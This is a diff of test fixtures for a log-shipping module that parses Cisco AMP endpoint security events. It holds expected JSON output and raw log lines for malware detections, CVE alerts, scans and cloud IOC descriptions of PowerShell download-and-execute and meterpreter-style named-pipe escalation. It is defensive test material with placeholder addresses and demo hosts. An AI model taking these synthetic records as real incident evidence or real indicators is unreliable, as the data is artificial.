"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-12T10:15:22.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6532910514396201000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 51389, + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:49:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:Malwaregen.21do.1201", + "cisco.amp.detection_id": "6525520937264087041", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 661000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525520937264087000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "cfdd16225e67471f5ef54cab9b3a5558", + "file.hash.sha1": 
"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c", + "file.hash.sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "file.name": "OLD.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 52332, + "process.hash.md5": "38ae1b3c38faef56fe4907922f0385ba", + "process.hash.sha1": "84123a3decdaa217e3588a1de59fe6cee1998004", + "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", + "process.name": "explorer.exe", + "process.pid": 2632, + "related.hash": [ + "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "cfdd16225e67471f5ef54cab9b3a5558", + "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.F2863A.211556.in02", + "cisco.amp.detection_id": "6525516191325224961", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 500000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + 
"event.dataset": "cisco.amp", + "event.id": 6525516191325225000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "c624d61b8f076c3ef05f74eeb96c8954", + "file.hash.sha1": "7d9518ea3f98d037745352b23861fab05d3777dc", + "file.hash.sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "file.name": "twhy.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55057, + "process.hash.md5": "92f44e405db16ac55d97e3bfe3b132fa", + "process.hash.sha1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d", + "process.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "process.name": "powershell.exe", + "process.pid": 4868, + "related.hash": [ + "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "c624d61b8f076c3ef05f74eeb96c8954", + "7d9518ea3f98d037745352b23861fab05d3777dc" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:41.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 516130000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1519340132516139000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2020-12-25T05:30:41.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 57784, + "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:41.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 474861000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1519340132474871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2020-12-25T05:30:41.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 59541, + "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:02:27.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": 
"8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2018-0762", + "CVE-2018-0772" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2018-0762", + "name": "Microsoft Internet Explorer", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762", + "version": "11" + }, + { + "cve": "CVE-2018-0772", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193384389977, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T05:02:27.000Z", + "file.hash.sha256": "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0", + "file.name": "mshtml.dll", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 61194, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:02:26.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2018-0762", + "CVE-2018-0772" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2018-0762", + "name": "Microsoft Internet Explorer", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762", + "version": "11" + }, + { + "cve": "CVE-2018-0772", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193384371995, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T05:02:26.000Z", + "file.hash.sha256": "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4", + "file.name": "mshtml.dll", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 62768, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:32:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + 
"ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2017-0106", + "CVE-2017-11774", + "CVE-2017-8506", + "CVE-2017-8507", + "CVE-2017-8571", + "CVE-2017-8663", + "CVE-2018-0791" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2017-0106", + "name": "Microsoft Office", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106", + "version": "2016" + }, + { + "cve": "CVE-2017-11774", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774" + }, + { + "cve": "CVE-2017-8506", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506" + }, + { + "cve": "CVE-2017-8507", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507" + }, + { + "cve": "CVE-2017-8571", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571" + }, + { + "cve": "CVE-2017-8663", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663" + }, + { + "cve": "CVE-2018-0791", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193366641599, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T04:32:53.000Z", + "file.hash.sha256": "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc", + "file.name": "OUTLOOK.EXE", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + 
"host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 64342, + "process.hash.sha256": "71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243", + "related.hash": [ + "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:22:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 878000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6525498672153625000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 66455, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:07:21.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 554696715, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + 
"cisco.amp.scan.clean": true, + "cisco.amp.scan.description": "Flash Scan", + "cisco.amp.scan.malicious_detections": 0, + "cisco.amp.scan.scanned_files": 2872, + "cisco.amp.scan.scanned_paths": 0, + "cisco.amp.scan.scanned_processes": 49, + "cisco.amp.timestamp_nanoseconds": 928000000, + "event.action": "Scan Completed, No Detections", + "event.dataset": "cisco.amp", + "event.id": 6525494703603843000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 67379, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:06:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 554696714, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.scan.description": "Flash Scan", + "cisco.amp.timestamp_nanoseconds": 537000000, + "event.action": "Scan Started", + "event.dataset": "cisco.amp", + "event.id": 6525494527510184000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 68455, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file 
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log index ed37c533eac2..ae6c21d78ff0 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log 
@@ -10,14 +10,6 @@ {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":14000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671380737589000,"timestamp":1610706458,"timestamp_nanoseconds":605000000,"date":"2021-01-15T10:27:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":81000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551547","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} 